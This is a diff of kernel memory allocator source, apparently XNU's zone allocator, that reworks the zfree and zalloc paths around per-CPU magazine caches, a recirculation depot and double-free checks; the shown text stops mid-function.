+        * metadata, and then insert them into the recirculation depot.
+        */
+       STAILQ_FOREACH(mag, &mags, zm_link) {
+               for (uint16_t i = 0; i < zc_mag_size(); i++) {
+                       zone_element_validate(zone, mag->zm_elems[i]);
                }
+       }
 
-               zid = nzones++;
-               z = zone_init_defaults(zid);
+       zone_lock_check_contention(zone, cache);
 
-               /*
-                * The release barrier pairs with the acquire in
-                * zone_index_foreach() and makes sure that enumeration loops
-                * always see an initialized zone lock.
-                */
-               os_atomic_store(&num_zones, nzones, release);
+       STAILQ_FOREACH(mag, &mags, zm_link) {
+               for (uint16_t i = 0; i < zc_mag_size(); i++) {
+                       zone_element_t e = mag->zm_elems[i];
+
+                       if (!zone_meta_mark_free(zone_meta_from_element(e), e)) {
+                               zone_meta_double_free_panic(zone, e, __func__);
+                       }
+               }
        }
+       STAILQ_CONCAT(&zone->z_recirc, &mags);
+       zone->z_recirc_cur += n;
 
-out:
-       num_zones_in_use++;
-       simple_unlock(&all_zones_lock);
+       zone_elems_free_add(zone, n * zc_mag_size());
 
-       return z;
+       zone_unlock(zone);
 }
 
-__abortlike
 static void
-zone_create_panic(const char *name, const char *f1, const char *f2)
+zfree_cached(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze)
 {
-       panic("zone_create: creating zone %s: flag %s and %s are incompatible",
-           name, f1, f2);
-}
-#define zone_create_assert_not_both(name, flags, current_flag, forbidden_flag) \
-       if ((flags) & forbidden_flag) { \
-               zone_create_panic(name, #current_flag, #forbidden_flag); \
+       zone_cache_t cache = zpercpu_get(zone->z_pcpu_cache);
+
+       if (cache->zc_free_cur >= zc_mag_size()) {
+               if (cache->zc_alloc_cur >= zc_mag_size()) {
+                       return zfree_cached_slow(zone, meta, ze, cache);
+               }
+               zone_cache_swap_magazines(cache);
+       }
+
+       if (__improbable(cache->zc_alloc_elems == NULL)) {
+               return zfree_item(zone, meta, ze);
+       }
+
+       if (zone_meta_is_free(meta, ze)) {
+               zone_meta_double_free_panic(zone, ze, __func__);
+       }
+
+       uint16_t idx = cache->zc_free_cur++;
+       if (idx >= zc_mag_size()) {
+               zone_accounting_panic(zone, "zc_free_cur overflow");
        }
+       cache->zc_free_elems[idx] = ze;
+
+       enable_preemption();
+}
 
 /*
- * Adjusts the size of the element based on minimum size, alignment
- * and kasan redzones
+ *     The function is noinline when zlog can be used so that the backtracing can
+ *     reliably skip the zfree_ext() and zfree_log_trace()
+ *     boring frames.
  */
-static vm_size_t
-zone_elem_adjust_size(
-       const char             *name __unused,
-       vm_size_t               elem_size,
-       zone_create_flags_t     flags,
-       vm_size_t              *redzone __unused)
+#if ZONE_ENABLE_LOGGING
+__attribute__((noinline))
+#endif /* ZONE_ENABLE_LOGGING */
+void
+zfree_ext(zone_t zone, zone_stats_t zstats, void *addr)
 {
-       vm_size_t size;
+       struct zone_page_metadata *page_meta;
+       vm_offset_t     elem = (vm_offset_t)addr;
+       vm_size_t       elem_size = zone_elem_size(zone);
+       zone_element_t  ze;
+
+       DTRACE_VM2(zfree, zone_t, zone, void*, addr);
+       TRACE_MACHLEAKS(ZFREE_CODE, ZFREE_CODE_2, elem_size, elem);
+#if VM_MAX_TAG_ZONES
+       if (__improbable(zone->tags)) {
+               vm_tag_t tag = *ztSlot(zone, elem) >> 1;
+               // set the tag with b0 clear so the block remains inuse
+               *ztSlot(zone, elem) = 0xFFFE;
+               vm_tag_update_zone_size(tag, zone->tag_zone_index,
+                   -(long)elem_size);
+       }
+#endif /* VM_MAX_TAG_ZONES */
+
+#if KASAN_ZALLOC
+       if (kasan_quarantine_freed_element(&zone, &addr)) {
+               return;
+       }
+       /*
+        * kasan_quarantine_freed_element() might return a different
+        * {zone, addr} than the one being freed for kalloc heaps.
+        *
+        * Make sure we reload everything.
+        */
+       elem = (vm_offset_t)addr;
+       elem_size = zone_elem_size(zone);
+#endif
+#if CONFIG_ZLEAKS
        /*
-        * Adjust element size for minimum size and pointer alignment
+        * Zone leak detection: un-track the allocation
         */
-       size = (elem_size + sizeof(vm_offset_t) - 1) & -sizeof(vm_offset_t);
-       if (((flags & ZC_PERCPU) == 0) && size < ZONE_MIN_ELEM_SIZE) {
-               size = ZONE_MIN_ELEM_SIZE;
+       if (__improbable(zone->zleak_on)) {
+               zleak_free(elem, elem_size);
+       }
+#endif /* CONFIG_ZLEAKS */
+#if ZONE_ENABLE_LOGGING
+       if (__improbable(DO_LOGGING(zone))) {
+               zfree_log_trace(zone, elem, __builtin_frame_address(0));
+       }
+#endif /* ZONE_ENABLE_LOGGING */
+#if CONFIG_GZALLOC
+       if (__improbable(zone->gzalloc_tracked)) {
+               return gzalloc_free(zone, zstats, addr);
        }
+#endif /* CONFIG_GZALLOC */
 
+       page_meta = zone_element_resolve(zone, elem, elem_size, &ze);
+       ze.ze_value |= zfree_clear_or_poison(zone, elem, elem_size);
 #if KASAN_ZALLOC
-       /*
-        * Expand the zone allocation size to include the redzones.
-        *
-        * For page-multiple zones add a full guard page because they
-        * likely require alignment.
-        */
-       vm_size_t redzone_tmp;
-       if (flags & (ZC_KASAN_NOREDZONE | ZC_PERCPU)) {
-               redzone_tmp = 0;
-       } else if ((size & PAGE_MASK) == 0) {
-               if (size != PAGE_SIZE && (flags & ZC_ALIGNMENT_REQUIRED)) {
-                       panic("zone_create: zone %s can't provide more than PAGE_SIZE"
-                           "alignment", name);
+       if (zone->z_percpu) {
+               zpercpu_foreach_cpu(i) {
+                       kasan_poison_range(elem + ptoa(i), elem_size,
+                           ASAN_HEAP_FREED);
                }
-               redzone_tmp = PAGE_SIZE;
-       } else if (flags & ZC_ALIGNMENT_REQUIRED) {
-               redzone_tmp = 0;
        } else {
-               redzone_tmp = KASAN_GUARD_SIZE;
-       }
-       size += redzone_tmp * 2;
-       if (redzone) {
-               *redzone = redzone_tmp;
+               kasan_poison_range(elem, elem_size, ASAN_HEAP_FREED);
        }
 #endif
-       return size;
+
+       disable_preemption();
+       zpercpu_get(zstats)->zs_mem_freed += elem_size;
+
+       if (zone->z_pcpu_cache) {
+               return zfree_cached(zone, page_meta, ze);
+       }
+
+       return zfree_item(zone, page_meta, ze);
 }
 
-/*
- * Returns the allocation chunk size that has least framentation
- */
-static vm_size_t
-zone_get_min_alloc_granule(
-       vm_size_t               elem_size,
-       zone_create_flags_t     flags)
+void
+(zfree)(union zone_or_view zov, void *addr)
 {
-       vm_size_t alloc_granule = PAGE_SIZE;
-       if (flags & ZC_PERCPU) {
-               alloc_granule = PAGE_SIZE * zpercpu_count();
-               if (PAGE_SIZE % elem_size > 256) {
-                       panic("zone_create: per-cpu zone has too much fragmentation");
-               }
-       } else if ((elem_size & PAGE_MASK) == 0) {
-               /* zero fragmentation by definition */
-               alloc_granule = elem_size;
-       } else if (alloc_granule % elem_size == 0) {
-               /* zero fragmentation by definition */
-       } else {
-               vm_size_t frag = (alloc_granule % elem_size) * 100 / alloc_granule;
-               vm_size_t alloc_tmp = PAGE_SIZE;
-               while ((alloc_tmp += PAGE_SIZE) <= ZONE_MAX_ALLOC_SIZE) {
-                       vm_size_t frag_tmp = (alloc_tmp % elem_size) * 100 / alloc_tmp;
-                       if (frag_tmp < frag) {
-                               frag = frag_tmp;
-                               alloc_granule = alloc_tmp;
-                       }
-               }
-       }
-       return alloc_granule;
+       zone_t zone = zov.zov_view->zv_zone;
+       zone_stats_t zstats = zov.zov_view->zv_stats;
+       assert(!zone->z_percpu);
+       zfree_ext(zone, zstats, addr);
 }
 
-vm_size_t
-zone_get_foreign_alloc_size(
-       const char             *name __unused,
-       vm_size_t               elem_size,
-       zone_create_flags_t     flags,
-       uint16_t                min_pages)
+void
+zfree_percpu(union zone_or_view zov, void *addr)
 {
-       vm_size_t adjusted_size = zone_elem_adjust_size(name, elem_size, flags,
-           NULL);
-       vm_size_t alloc_granule = zone_get_min_alloc_granule(adjusted_size,
-           flags);
-       vm_size_t min_size = min_pages * PAGE_SIZE;
-       /*
-        * Round up min_size to a multiple of alloc_granule
-        */
-       return ((min_size + alloc_granule - 1) / alloc_granule)
-              * alloc_granule;
+       zone_t zone = zov.zov_view->zv_zone;
+       zone_stats_t zstats = zov.zov_view->zv_stats;
+       assert(zone->z_percpu);
+       zfree_ext(zone, zstats, (void *)__zpcpu_demangle(addr));
 }
 
-zone_t
-zone_create_ext(
-       const char             *name,
-       vm_size_t               size,
-       zone_create_flags_t     flags,
-       zone_id_t               desired_zid,
-       void                  (^extra_setup)(zone_t))
+/*! @} */
+#endif /* !ZALLOC_TEST */
+#pragma mark zalloc
+#if !ZALLOC_TEST
+
+/*!
+ * @defgroup zalloc
+ * @{
+ *
+ * @brief
+ * The codepath for zone allocations.
+ *
+ * @discussion
+ * There are 4 major ways to allocate memory that end up in the zone allocator:
+ * - @c zalloc(), @c zalloc_flags(), ...
+ * - @c zalloc_percpu()
+ * - @c kalloc*()
+ * - @c zalloc_permanent()
+ *
+ * While permanent zones have their own allocation scheme, all other codepaths
+ * will eventually go through the @c zalloc_ext() choking point.
+ *
+ * Ignoring the @c zalloc_gz() codepath, the decision tree looks like this:
+ * <code>
+ * zalloc_ext()
+ *      â”‚
+ *      â”œâ”€â”€â”€> zalloc_cached() â”€â”€â”€â”€â”€â”€> zalloc_cached_fast() â”€â”€â”€â•®
+ *      â”‚         â”‚                             ^             â”‚
+ *      â”‚         â”‚                             â”‚             â”‚
+ *      â”‚         â•°â”€â”€â”€> zalloc_cached_slow() â”€â”€â”€â•¯             â”‚
+ *      â”‚                         â”‚                           â”‚
+ *      â”‚<─────────────────╮      â”œâ”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â•®             â”‚
+ *      â”‚                  â”‚      â”‚             â”‚             â”‚
+ *      â”‚                  â”‚      v             â”‚             â”‚
+ *      â”‚<───────╮  â•­â”€â”€> zalloc_item_slow() â”€â”€â”€â”€â”¤             â”‚
+ *      â”‚        â”‚  â”‚                           â”‚             â”‚
+ *      â”‚        â”‚  â”‚                           v             â”‚
+ *      â•°â”€â”€â”€> zalloc_item() â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€> zalloc_item_fast() â”€â”€â”€â”¤
+ *                                                            â”‚
+ *                                                            v
+ *                                                     zalloc_return()
+ * </code>
+ *
+ *
+ * The @c zalloc_item() track is used when zone caching is off:
+ * - @c zalloc_item_fast() is used when there are enough elements available,
+ * - @c zalloc_item_slow() is used when a refill is needed, which can cause
+ *   the zone to grow. This is the only codepath that refills.
+ *
+ * This track uses the zone lock for serialization:
+ * - taken in @c zalloc_item(),
+ * - maintained during @c zalloc_item_slow() (possibly dropped and re-taken),
+ * - dropped in @c zalloc_item_fast().
+ *
+ *
+ * The @c zalloc_cached() track is used when zone caching is on:
+ * - @c zalloc_cached_fast() is taken when the cache has elements,
+ * - @c zalloc_cached_slow() is taken if a cache refill is needed.
+ *   It can chose many strategies:
+ *    ~ @c zalloc_cached_from_depot() to try to reuse cpu stashed magazines,
+ *    ~ using the global recirculation depot @c z_recirc,
+ *    ~ using zalloc_import() if the zone has enough elements,
+ *    ~ falling back to the @c zalloc_item() track if zone caching is disabled
+ *      due to VM pressure or the zone has no available elements.
+ *
+ * This track disables preemption for serialization:
+ * - preemption is disabled in @c zalloc_cached(),
+ * - kept disabled during @c zalloc_cached_slow(), converted into a zone lock
+ *   if switching to @c zalloc_item_slow(),
+ * - preemption is reenabled in @c zalloc_cached_fast().
+ *
+ * @c zalloc_cached_from_depot() also takes depot locks (taken by the caller,
+ * released by @c zalloc_cached_from_depot().
+ *
+ * In general the @c zalloc_*_slow() codepaths deal with refilling and will
+ * tail call into the @c zalloc_*_fast() code to perform the actual allocation.
+ *
+ * @c zalloc_return() is the final function everyone tail calls into,
+ * which prepares the element for consumption by the caller and deals with
+ * common treatment (zone logging, tags, kasan, validation, ...).
+ */
+
+/*!
+ * @function zalloc_import
+ *
+ * @brief
+ * Import @c n elements in the specified array, opposite of @c zfree_drop().
+ *
+ * @param zone          The zone to import elements from
+ * @param elems         The array to import into
+ * @param n             The number of elements to import. Must be non zero,
+ *                      and smaller than @c zone->z_elems_free.
+ */
+__header_always_inline void
+zalloc_import(zone_t zone, zone_element_t *elems, uint32_t n)
 {
-       vm_size_t alloc;
-       vm_size_t redzone;
-       zone_t z;
+       vm_size_t esize = zone_elem_size(zone);
+       uint32_t i = 0;
 
-       if (size > ZONE_MAX_ALLOC_SIZE) {
-               panic("zone_create: element size too large: %zd", (size_t)size);
-       }
+       assertf(STAILQ_EMPTY(&zone->z_recirc),
+           "Trying to import from zone %p [%s%s] with non empty recirc",
+           zone, zone_heap_name(zone), zone_name(zone));
 
-       size = zone_elem_adjust_size(name, size, flags, &redzone);
-       /*
-        * Allocate the zone slot, return early if we found an older match.
-        */
-       z = zone_create_find(name, size, flags, desired_zid);
-       if (__improbable(z->z_self)) {
-               /* We found a zone to reuse */
-               return z;
-       }
+       do {
+               vm_offset_t page, eidx, size = 0;
+               struct zone_page_metadata *meta;
+
+               if (!zone_pva_is_null(zone->z_pageq_partial)) {
+                       meta = zone_pva_to_meta(zone->z_pageq_partial);
+                       page = zone_pva_to_addr(zone->z_pageq_partial);
+               } else if (!zone_pva_is_null(zone->z_pageq_empty)) {
+                       meta = zone_pva_to_meta(zone->z_pageq_empty);
+                       page = zone_pva_to_addr(zone->z_pageq_empty);
+                       zone_counter_sub(zone, z_wired_empty, meta->zm_chunk_len);
+               } else {
+                       zone_accounting_panic(zone, "z_elems_free corruption");
+               }
 
-       /*
-        * Initialize the zone properly.
-        */
+               if (!zone_has_index(zone, meta->zm_index)) {
+                       zone_page_metadata_index_confusion_panic(zone, page, meta);
+               }
 
-       /*
-        * If the kernel is post lockdown, copy the zone name passed in.
-        * Else simply maintain a pointer to the name string as it can only
-        * be a core XNU zone (no unloadable kext exists before lockdown).
-        */
-       if (startup_phase >= STARTUP_SUB_LOCKDOWN) {
-               size_t nsz = MIN(strlen(name) + 1, MACH_ZONE_NAME_MAX_LEN);
-               char *buf = zalloc_permanent(nsz, ZALIGN_NONE);
-               strlcpy(buf, name, nsz);
-               z->z_name = buf;
+               vm_offset_t old_size = meta->zm_alloc_size;
+               vm_offset_t max_size = ptoa(meta->zm_chunk_len) + ZM_ALLOC_SIZE_LOCK;
+
+               do {
+                       eidx = zone_meta_find_and_clear_bit(zone, meta);
+                       elems[i++] = zone_element_encode(page, eidx, ZPM_AUTO);
+                       size += esize;
+               } while (i < n && old_size + size + esize <= max_size);
+
+               vm_offset_t new_size = zone_meta_alloc_size_add(zone, meta, size);
+
+               if (new_size + esize > max_size) {
+                       zone_meta_requeue(zone, &zone->z_pageq_full, meta);
+               } else if (old_size == 0) {
+                       /* remove from free, move to intermediate */
+                       zone_meta_requeue(zone, &zone->z_pageq_partial, meta);
+               }
+       } while (i < n);
+}
+
+/*!
+ * @function zalloc_return
+ *
+ * @brief
+ * Performs the tail-end of the work required on allocations before the caller
+ * uses them.
+ *
+ * @discussion
+ * This function is called without any zone lock held,
+ * and preemption back to the state it had when @c zalloc_ext() was called.
+ *
+ * @param zone          The zone we're allocating from.
+ * @param ze            The encoded element we just allocated.
+ * @param flags         The flags passed to @c zalloc_ext() (for Z_ZERO).
+ * @param elem_size     The element size for this zone.
+ * @param freemag       An optional magazine that needs to be freed.
+ */
+__attribute__((noinline))
+static void *
+zalloc_return(zone_t zone, zone_element_t ze, zalloc_flags_t flags,
+    vm_offset_t elem_size, zone_magazine_t freemag)
+{
+       vm_offset_t addr = zone_element_addr(ze, elem_size);
+
+#if KASAN_ZALLOC
+       if (zone->z_percpu) {
+               zpercpu_foreach_cpu(i) {
+                       kasan_poison_range(addr + ptoa(i), elem_size,
+                           ASAN_VALID);
+               }
        } else {
-               z->z_name = name;
+               kasan_poison_range(addr, elem_size, ASAN_VALID);
+       }
+#endif
+#if ZALLOC_ENABLE_POISONING
+       zalloc_validate_element(zone, addr, elem_size, zone_element_prot(ze));
+#endif /* ZALLOC_ENABLE_POISONING */
+#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS
+       if (__improbable(zalloc_should_log_or_trace_leaks(zone, elem_size))) {
+               zalloc_log_or_trace_leaks(zone, addr, __builtin_frame_address(0));
+       }
+#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */
+#if KASAN_ZALLOC
+       if (zone->z_kasan_redzone) {
+               addr = kasan_alloc(addr, elem_size,
+                   elem_size - 2 * zone->z_kasan_redzone,
+                   zone->z_kasan_redzone);
+               elem_size -= 2 * zone->z_kasan_redzone;
        }
        /*
-        * If zone_init() hasn't run yet, the permanent zones do not exist.
-        * We can limp along without properly initialized stats for a while,
-        * zone_init() will rebuild the missing stats when it runs.
+        * Initialize buffer with unique pattern only if memory
+        * wasn't expected to be zeroed.
         */
-       if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) {
-               z->z_stats = zalloc_percpu_permanent_type(struct zone_stats);
+       if (!zone->z_free_zeroes && !(flags & Z_ZERO)) {
+               kasan_leak_init(addr, elem_size);
+       }
+#endif /* KASAN_ZALLOC */
+       if ((flags & Z_ZERO) && !zone->z_free_zeroes) {
+               bzero((void *)addr, elem_size);
        }
 
-       alloc = zone_get_min_alloc_granule(size, flags);
-
-       if (flags & ZC_KALLOC_HEAP) {
-               size_t rem = (alloc % size) / (alloc / size);
+#if VM_MAX_TAG_ZONES
+       if (__improbable(zone->tags)) {
+               vm_tag_t tag = zalloc_flags_get_tag(flags);
+               if (tag == VM_KERN_MEMORY_NONE) {
+                       tag = VM_KERN_MEMORY_KALLOC;
+               }
+               // set the tag with b0 clear so the block remains inuse
+               *ztSlot(zone, addr) = (vm_tag_t)(tag << 1);
+               vm_tag_update_zone_size(tag, zone->tag_zone_index,
+                   (long)elem_size);
+       }
+#endif /* VM_MAX_TAG_ZONES */
 
-               /*
-                * Try to grow the elements size and spread them more if the remaining
-                * space is large enough.
-                */
-               size += rem & ~(KALLOC_MINALIGN - 1);
+       TRACE_MACHLEAKS(ZALLOC_CODE, ZALLOC_CODE_2, elem_size, addr);
+       DTRACE_VM2(zalloc, zone_t, zone, void*, addr);
+       if (freemag) {
+               zone_magazine_free(freemag);
        }
+       return (void *)addr;
+}
 
-       z->pcpu_elem_size = z->z_elem_size = (uint16_t)size;
-       z->alloc_pages = (uint16_t)atop(alloc);
-#if KASAN_ZALLOC
-       z->kasan_redzone = redzone;
-       if (strncmp(name, "fakestack.", sizeof("fakestack.") - 1) == 0) {
-               z->kasan_fakestacks = true;
+#if CONFIG_GZALLOC
+/*!
+ * @function zalloc_gz
+ *
+ * @brief
+ * Performs allocations for zones using gzalloc.
+ *
+ * @discussion
+ * This function is noinline so that it doesn't affect the codegen
+ * of the fastpath.
+ */
+__attribute__((noinline))
+static void *
+zalloc_gz(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
+{
+       vm_offset_t addr = gzalloc_alloc(zone, zstats, flags);
+       return zalloc_return(zone, zone_element_encode(addr, 0, ZPM_AUTO),
+                  flags, zone_elem_size(zone), NULL);
+}
+#endif /* CONFIG_GZALLOC */
+
+static void *
+zalloc_item_fast(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
+{
+       vm_size_t esize = zone_elem_size(zone);
+       zone_element_t ze;
+
+       zalloc_import(zone, &ze, 1);
+       zone_elems_free_sub(zone, 1);
+       zpercpu_get(zstats)->zs_mem_allocated += esize;
+       zone_unlock(zone);
+
+       return zalloc_return(zone, ze, flags, esize, NULL);
+}
+
+/*!
+ * @function zalloc_item_slow
+ *
+ * @brief
+ * Performs allocations when the zone is out of elements.
+ *
+ * @discussion
+ * This function might drop the lock and reenable preemption,
+ * which means the per-CPU caching layer or recirculation depot
+ * might have received elements.
+ */
+__attribute__((noinline))
+static void *
+zalloc_item_slow(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
+{
+       if (zone->z_replenishes) {
+               zone_replenish_locked(zone);
+       } else {
+               if ((flags & Z_NOWAIT) == 0) {
+                       zone_expand_locked(zone, flags, zalloc_needs_refill);
+               }
+               if (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) {
+                       zone_expand_async_schedule_if_needed(zone);
+               }
+               if (__improbable(zone->z_elems_free == 0)) {
+                       zone_unlock(zone);
+                       if (__improbable(flags & Z_NOFAIL)) {
+                               zone_nofail_panic(zone);
+                       }
+                       DTRACE_VM2(zalloc, zone_t, zone, void*, NULL);
+                       return NULL;
+               }
        }
-#endif
 
        /*
-        * Handle KPI flags
+        * We might have changed core or got preempted/blocked while expanding
+        * the zone. Allocating from the zone when the recirculation depot
+        * is not empty is not allowed.
+        *
+        * It will be rare but possible for the depot to refill while we were
+        * waiting for pages. If that happens we need to start over.
         */
-#if __LP64__
-       if (flags & ZC_SEQUESTER) {
-               z->va_sequester = true;
+       if (!STAILQ_EMPTY(&zone->z_recirc)) {
+               zone_unlock(zone);
+               return zalloc_ext(zone, zstats, flags);
        }
-#endif
-       /* ZC_CACHING applied after all configuration is done */
 
-       if (flags & ZC_PERCPU) {
-               /*
-                * ZC_CACHING is disallowed because it uses per-cpu zones for its
-                * implementation and it would be circular. These allocations are
-                * also quite expensive, so caching feels dangerous memory wise too.
-                *
-                * ZC_ZFREE_CLEARMEM is forced because per-cpu zones allow for
-                * pointer-sized allocations which poisoning doesn't support.
-                */
-               zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_CACHING);
-               zone_create_assert_not_both(name, flags, ZC_PERCPU, ZC_ALLOW_FOREIGN);
-               z->percpu = true;
-               z->gzalloc_exempt = true;
-               z->zfree_clear_mem = true;
-               z->pcpu_elem_size *= zpercpu_count();
-       }
-       if (flags & ZC_ZFREE_CLEARMEM) {
-               z->zfree_clear_mem = true;
-       }
-       if (flags & ZC_NOGC) {
-               z->collectable = false;
-       }
-       if (flags & ZC_NOENCRYPT) {
-               z->noencrypt = true;
-       }
-       if (flags & ZC_ALIGNMENT_REQUIRED) {
-               z->alignment_required = true;
-       }
-       if (flags & ZC_NOGZALLOC) {
-               z->gzalloc_exempt = true;
-       }
-       if (flags & ZC_NOCALLOUT) {
-               z->no_callout = true;
-       }
-       if (flags & ZC_DESTRUCTIBLE) {
-               zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_CACHING);
-               zone_create_assert_not_both(name, flags, ZC_DESTRUCTIBLE, ZC_ALLOW_FOREIGN);
-               z->destructible = true;
-       }
+       return zalloc_item_fast(zone, zstats, flags);
+}
+
+/*!
+ * @function zalloc_item
+ *
+ * @brief
+ * Performs allocations when zone caching is off.
+ *
+ * @discussion
+ * This function calls @c zalloc_item_slow() when refilling the zone
+ * is needed, or @c zalloc_item_fast() if the zone has enough free elements.
+ */
+static void *
+zalloc_item(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
+{
+       zone_lock_check_contention(zone, NULL);
 
        /*
-        * Handle Internal flags
+        * When we commited to the zalloc_item() path,
+        * zone caching might have been flipped/enabled.
+        *
+        * If we got preempted for long enough, the recirculation layer
+        * can have been populated, and allocating from the zone would be
+        * incorrect.
+        *
+        * So double check for this extremely rare race here.
         */
-       if (flags & ZC_ALLOW_FOREIGN) {
-               z->allows_foreign = true;
+       if (__improbable(!STAILQ_EMPTY(&zone->z_recirc))) {
+               zone_unlock(zone);
+               return zalloc_ext(zone, zstats, flags);
        }
-       if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) &&
-           (flags & ZC_DATA_BUFFERS)) {
-               z->submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP;
+
+       if (__improbable(zone->z_elems_free <= zone->z_elems_rsv)) {
+               return zalloc_item_slow(zone, zstats, flags);
        }
-       if (flags & ZC_KASAN_NOQUARANTINE) {
-               z->kasan_noquarantine = true;
+
+       return zalloc_item_fast(zone, zstats, flags);
+}
+
+static void *
+zalloc_cached_fast(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags,
+    zone_cache_t cache, zone_magazine_t freemag)
+{
+       vm_offset_t esize = zone_elem_size(zone);
+       zone_element_t ze;
+       uint32_t index;
+
+       index = --cache->zc_alloc_cur;
+       if (index >= zc_mag_size()) {
+               zone_accounting_panic(zone, "zc_alloc_cur wrap around");
        }
-       /* ZC_KASAN_NOREDZONE already handled */
+       ze = cache->zc_alloc_elems[index];
+       cache->zc_alloc_elems[index].ze_value = 0;
 
-       /*
-        * Then if there's extra tuning, do it
-        */
-       if (extra_setup) {
-               extra_setup(z);
+       zpercpu_get(zstats)->zs_mem_allocated += esize;
+       enable_preemption();
+
+       if (zone_meta_is_free(zone_meta_from_element(ze), ze)) {
+               zone_meta_double_free_panic(zone, ze, __func__);
        }
 
-       /*
-        * Configure debugging features
-        */
-#if CONFIG_GZALLOC
-       gzalloc_zone_init(z); /* might set z->gzalloc_tracked */
-#endif
-#if ZONE_ENABLE_LOGGING
-       if (!z->gzalloc_tracked && num_zones_logged < max_num_zones_to_log) {
-               /*
-                * Check for and set up zone leak detection if requested via boot-args.
-                * might set z->zone_logging
-                */
-               zone_setup_logging(z);
+       return zalloc_return(zone, ze, flags, esize, freemag);
+}
+
+static void *
+zalloc_cached_from_depot(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags,
+    zone_cache_t cache, zone_cache_t depot, zone_magazine_t mag)
+{
+       STAILQ_REMOVE_HEAD(&depot->zc_depot, zm_link);
+       if (depot->zc_depot_cur-- == 0) {
+               zone_accounting_panic(zone, "zc_depot_cur wrap-around");
        }
-#endif /* ZONE_ENABLE_LOGGING */
-#if VM_MAX_TAG_ZONES
-       if (!z->gzalloc_tracked && z->kalloc_heap && zone_tagging_on) {
-               static int tag_zone_index;
-               vm_offset_t esize = zone_elem_size(z);
-               z->tags = true;
-               z->tags_inline = (((page_size + esize - 1) / esize) <=
-                   (sizeof(uint32_t) / sizeof(uint16_t)));
-               z->tag_zone_index = os_atomic_inc_orig(&tag_zone_index, relaxed);
-               assert(z->tag_zone_index < VM_MAX_TAG_ZONES);
+       zone_depot_unlock_nopreempt(depot);
+
+       mag = zone_magazine_replace(&cache->zc_alloc_cur,
+           &cache->zc_alloc_elems, mag);
+
+       z_debug_assert(cache->zc_alloc_cur == zc_mag_size());
+       z_debug_assert(mag->zm_cur == 0);
+
+       if (zone == zc_magazine_zone) {
+               enable_preemption();
+               bzero(mag, zone_elem_size(zone));
+               return mag;
        }
-#endif
+
+       return zalloc_cached_fast(zone, zstats, flags, cache, mag);
+}
+
+__attribute__((noinline))
+static void *
+zalloc_cached_slow(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags,
+    zone_cache_t cache)
+{
+       zone_magazine_t mag = NULL;
+       struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags);
 
        /*
-        * Finally, fixup properties based on security policies, boot-args, ...
+        * Try to allocate from our local depot, if there's one.
         */
-       if ((ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) &&
-           z->kalloc_heap == KHEAP_ID_DATA_BUFFERS) {
-               z->submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP;
-       }
-#if __LP64__
-       if ((ZSECURITY_OPTIONS_SEQUESTER & zsecurity_options) &&
-           (flags & ZC_NOSEQUESTER) == 0 &&
-           z->submap_idx == Z_SUBMAP_IDX_GENERAL_MAP) {
-               z->va_sequester = true;
+       if (STAILQ_FIRST(&cache->zc_depot)) {
+               zone_depot_lock_nopreempt(cache);
+
+               if ((mag = STAILQ_FIRST(&cache->zc_depot)) != NULL) {
+                       return zalloc_cached_from_depot(zone, zstats, flags,
+                                  cache, cache, mag);
+               }
+
+               zone_depot_unlock_nopreempt(cache);
        }
-#endif
+
+       zone_lock_nopreempt_check_contention(zone, cache);
+
        /*
-        * Always clear zone elements smaller than a cacheline,
-        * because it's pretty close to free.
+        * If the recirculation depot is empty, we'll need to import.
+        * The system is tuned for this to be extremely rare.
         */
-       if (size <= zp_min_size) {
-               z->zfree_clear_mem = true;
-       }
-       if (zp_factor != 0 && !z->zfree_clear_mem) {
-               z->zp_count = zone_poison_count_init(z);
-       }
+       if (__improbable(STAILQ_EMPTY(&zone->z_recirc))) {
+               uint16_t n_elems = zc_mag_size();
 
-#if CONFIG_ZCACHE
-       if ((flags & ZC_NOCACHING) == 0) {
-               /*
-                * Append kalloc heap name to zone name (if zone is used by kalloc)
-                */
-               char temp_zone_name[MAX_ZONE_NAME] = "";
-               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name);
+               if (zone->z_elems_free < n_elems + zone->z_elems_rsv / 2 &&
+                   os_sub_overflow(zone->z_elems_free,
+                   zone->z_elems_rsv / 2, &n_elems)) {
+                       n_elems = 0;
+               }
 
-               /* Check if boot-arg specified it should have a cache */
-               if (track_this_zone(temp_zone_name, cache_zone_name)) {
-                       flags |= ZC_CACHING;
-               } else if (zcc_kalloc && z->kalloc_heap) {
-                       flags |= ZC_CACHING;
+               z_debug_assert(n_elems <= zc_mag_size());
+
+               if (__improbable(n_elems == 0)) {
+                       /*
+                        * If importing elements would deplete the zone,
+                        * call zalloc_item_slow()
+                        */
+                       return zalloc_item_slow(zone, zstats, flags);
                }
+
+               if (__improbable(zone_caching_disabled)) {
+                       if (__improbable(zone_caching_disabled < 0)) {
+                               /*
+                                * In the first 10s after boot, mess with
+                                * the scan position in order to make early
+                                * allocations patterns less predictible.
+                                */
+                               zone_early_scramble_rr(zone, zstats);
+                       }
+                       return zalloc_item_fast(zone, zstats, flags);
+               }
+
+               zalloc_import(zone, cache->zc_alloc_elems, n_elems);
+
+               cache->zc_alloc_cur = n_elems;
+               zone_elems_free_sub(zone, n_elems);
+
+               zone_unlock_nopreempt(zone);
+
+               return zalloc_cached_fast(zone, zstats, flags, cache, NULL);
        }
-       if ((flags & ZC_CACHING) &&
